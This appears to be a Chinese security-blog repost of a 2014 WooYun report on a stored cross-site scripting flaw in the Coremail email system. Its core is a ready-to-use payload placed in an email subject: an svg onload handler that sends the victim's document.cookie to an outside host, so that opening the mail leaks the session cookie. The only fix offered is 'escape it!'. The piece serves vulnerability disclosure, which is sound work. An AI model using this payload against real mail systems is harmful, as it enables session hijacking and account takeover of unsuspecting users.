记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Coremail邮件系统存储型XSS

2014-08-23 13:55

给受害者发送主题如下的邮件:



<svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'>



1.jpg

漏洞证明:

当受害者试图打开邮件时,cookie将会被窃取:



2.jpg





修复方案:

escape it!

知识来源: www.wooyun.org/bugs/wooyun-2014-062248

阅读:100739 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“Coremail邮件系统存储型XSS”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词